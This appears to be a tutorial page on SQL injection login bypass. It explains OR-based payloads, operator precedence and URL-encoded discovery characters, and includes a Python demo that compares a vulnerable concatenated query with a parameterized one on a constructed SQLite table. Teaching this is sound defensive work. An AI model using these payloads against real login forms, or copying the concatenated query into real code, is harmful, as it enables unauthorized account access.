Subverting Query Logic

Modifying original SQL queries by injecting the OR operator and using comments to bypass the intended logic.

Authentication Bypass

A typical login query:

SELECT * FROM logins WHERE username='admin' AND password = 'p@ssw0rd';

The application checks if the query returns matching records. If so, login succeeds.

SQLi Discovery

Test for SQL injection by appending payloads to the username field:

Payload   URL Encoded
'         %27
"         %22
#         %23
;         %3B
)         %29

Use URL-encoded versions when the payload is placed directly in the URL (HTTP GET requests).

Injecting a single quote into the username field produces a syntax error because the resulting query has an odd number of quotes:

SELECT * FROM logins WHERE username=''' AND password = 'something';

A syntax error (instead of “Login Failed”) confirms the form is vulnerable.

OR Injection

The goal is to make the WHERE clause always evaluate to TRUE. Key concept: MySQL evaluates AND before OR (operator precedence).

Known Username

Inject admin' or '1'='1 as the username:

SELECT * FROM logins WHERE username='admin' or '1'='1' AND password = 'something';

Evaluation order:

  1. AND first: '1'='1' (True) AND password='something' (False) = False
  2. OR next: username='admin' (True) OR False = True

The query succeeds if admin exists in the table, regardless of the password.

Unknown Username

If the username is unknown, the OR trick in the username field alone won’t work because the username comparison returns False, making the entire expression False.

Instead, inject into the password field as well. Use something' or '1'='1 as the password:

SELECT * FROM logins WHERE username='notAdmin' OR '1'='1' AND password='something' OR '1'='1';

The trailing OR '1'='1' forces the overall query to True, returning all rows. The application logs in as the first user in the table.

Minimal Payload

Both fields can use the same injection — no valid username or password needed:

  • Username: ' or '1' = '1
  • Password: ' or '1' = '1

SELECT * FROM logins WHERE username='' OR '1'='1' AND password='' OR '1'='1';

This evaluates to True regardless of credentials and returns all rows.
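The following script is an added example, not code from the original page. It builds the login query from this section both ways: by string concatenation, as the vulnerable application does, and with bound parameters. Run against a constructed in-memory SQLite logins table (the table contents and the function names make_db, vulnerable_login and safe_login are assumptions for the example), it reproduces each step above: the single quote from the discovery step raises a syntax error, the known-username payload matches only admin, and the unknown-username and minimal payloads return every row. SQLite applies the same AND-before-OR precedence as MySQL, so the evaluation order is identical.

```python
import sqlite3


def make_db():
    """Constructed sample data for the example: a tiny logins table."""
    conn = sqlite3.connect(":memory:")
    conn.execute(
        "CREATE TABLE logins (id INTEGER PRIMARY KEY, username TEXT, password TEXT)"
    )
    conn.executemany(
        "INSERT INTO logins (username, password) VALUES (?, ?)",
        [("admin", "p@ssw0rd"), ("tom", "tom123"), ("john", "john456")],
    )
    return conn


def vulnerable_login(conn, username, password):
    """Builds the WHERE clause by concatenation, exactly like the page's query.

    Returns the usernames of all matching rows, or the string "syntax error"
    when the database rejects the query (the discovery signal from above:
    an odd number of quotes). Because AND binds tighter than OR, a trailing
    OR '1'='1' anywhere in the clause makes every row match.
    """
    query = (
        f"SELECT username FROM logins WHERE username='{username}' "
        f"AND password='{password}'"
    )
    try:
        rows = conn.execute(query).fetchall()
    except sqlite3.OperationalError:
        return "syntax error"
    return [row[0] for row in rows]


def safe_login(conn, username, password):
    """Same check with bound parameters: the input is passed as data and is
    never parsed as SQL, so quotes and OR operators cannot alter the logic."""
    rows = conn.execute(
        "SELECT username FROM logins WHERE username=? AND password=?",
        (username, password),
    ).fetchall()
    return [row[0] for row in rows]


if __name__ == "__main__":
    conn = make_db()
    # Each pair is (username field, password field) from the steps above.
    cases = {
        "valid creds": ("admin", "p@ssw0rd"),
        "discovery (single quote)": ("'", "something"),
        "known username": ("admin' or '1'='1", "something"),
        "unknown username": ("notAdmin' OR '1'='1", "something' OR '1'='1"),
        "minimal payload": ("' or '1' = '1", "' or '1' = '1"),
    }
    for name, (user, pw) in cases.items():
        print(f"{name:26} vulnerable={vulnerable_login(conn, user, pw)!r:30} "
              f"safe={safe_login(conn, user, pw)!r}")
```

Two things stand out when the script runs. The parameterized version returns an empty result for every payload, because the OR never becomes part of the statement. And the concatenated version leaks its vulnerability through the raw database error on the single-quote test, which is why returning a generic "Login Failed" for any exception, and logging the real error server-side, is worth doing even once queries are parameterized.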

A comprehensive list of auth bypass payloads is available at PayloadsAllTheThings.